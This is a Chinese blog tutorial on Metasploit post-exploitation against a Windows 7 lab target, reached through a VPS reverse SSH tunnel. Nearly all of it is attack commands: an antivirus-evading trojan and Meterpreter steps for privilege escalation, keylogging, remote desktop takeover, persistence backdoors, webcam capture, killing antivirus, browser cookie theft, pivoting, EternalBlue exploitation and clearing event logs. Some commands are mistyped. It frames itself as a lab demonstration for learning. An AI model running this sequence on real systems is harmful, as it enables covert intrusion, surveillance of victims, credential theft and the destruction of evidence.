Metasploit 一条龙服务

安全工具 2019-11-10

Metasploit 是目前最流行、最强大、最具扩展性的渗透测试平台软件,是笔者最崇拜也最喜欢的工具没有之一,下面我将用 msf 给大家带来一场盛大的内网渗透体验,别眨眼噢!

0x01. 实战操作

环境准备:

靶机 win 7 IP=192.168.43.150 kali linux IP=192.168.43.153 VPS 服务器 IP=xx.xx.xx.xx

实战演示:

1、先用 evil-evasion 生成具有一定免杀功能的 windows 木马,监听地址设成 VPS 的地址(打码防 D),然后将 VPS 上的 2333 端口映射到内网 kali 的 2333 端口,同时还要修改 VPS上 的 ssh 配置,不然别人是连不上 VPS 的(在实战中自己常常在内网,所以这里介绍一下 VPS )

vi /etc/ssh/sshd_config && GatewayPorts:yes

ssh -CfNg -R xx.xx.xx.xx:2333:192.168.43.153:2333 root@xx.xx.xx.xx -p 29402

img

img

2、启动 kali 设置 msf 监听,lport=2333lhost=192.168.43.153 (注意:这里的监听地址是 kali 的地址,不是 VPS 的),关于 msf 的基本操作网上有很多,这里不过多介绍,大家可以参考这个系列文章

http://www.freebuf.com/sectool/67674.html

[*]如果想要在 docker 启动持续监听可以用如下命令:

set exitonsession false && run -j

img

3、在 win 7 中执行木马

img

4、接收到 meterpreter 之后就应该将自己的进程迁移到一个隐蔽的进程中去,防止被查杀,这里笔者迁移到 win 7的桌面进程:

migrate 1988 && getpid

img

5、查看当前权限、系统信息,并尝试提权

getuid && sysinfo && getsystem

img

6、查看网络、路由信息

ifconfig && route

img

img

7、监视靶机的桌面

run vnc

img

8、启动键盘监听

keyscan_start && keyscan_dump

img

9、设置后门,维持权限

run persistence -U -i 10 -p 2333192.168.43.153

run persistence -X -i 10 -p 2333192.168.43.153

img

10、截屏查看靶机当前桌面

screenshot

img

11、查看当前系统空闲时间

idletime

img

12、禁用靶机使用键盘鼠标(笔者 win 7 系统是 64 位的,不支持这个操作)

uictl disable keyboard

uictl disable mouse

img

13、查找靶机中重要的敏感文件

search -d c:\ -f payload.exe

img

14、指定下载靶机中的文件到本地

dowmloadc:\Users\root\Desktop\payload.exe/root/Desktop

img

15、上传指定本地文件到靶机中

upload/root/Desktop/hack.jpegc:\Users\root\Desktop\payload.exe

img

16、打开靶机摄像头,win 7 虚拟机没有摄像头所以没反应

webcam_snap

img


0x02. 后渗透测试

1、调用 post 模块查看当前系统可用的提权模块

run post/multi/recon/local_exploit_suggester

img

2、调用 payload 模块对靶机进行远程桌面操作

set payload windows/vncinject/reverse_tcp

set viewonly no

img

3、关掉靶机中的杀软

killav

img

4、收集靶机浏览器的敏感信息(访问记录、cookie )

run post/windows/gather/enum_ie

img

5、设置路由转发,扫描内网机器开放的端口( routeadd 靶机 IP 子网掩码 sessions )

route add 92.168.43.150 255.255.255.0 3

use auxiliary/scanner/portscan/tcp

img

6、扫描一波内网有没有 ms17_010 漏洞的主机

use auxiliary/scanner/smb/smb_ms17_010

img

7、笔者扫到 win 7 就有这个漏洞,然后就愉快的调用 exp 搞一波

use exploit/windows/smb/ms17_010_eternalblue

img

8、功成身退

clearev


0x03. 结语

msf是真的强大,笔者总结的这些也只算是九牛一毛,大家在平时使用时多总结一定能玩出花儿来!


本文由 信安之路 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

楼主残忍的关闭了评论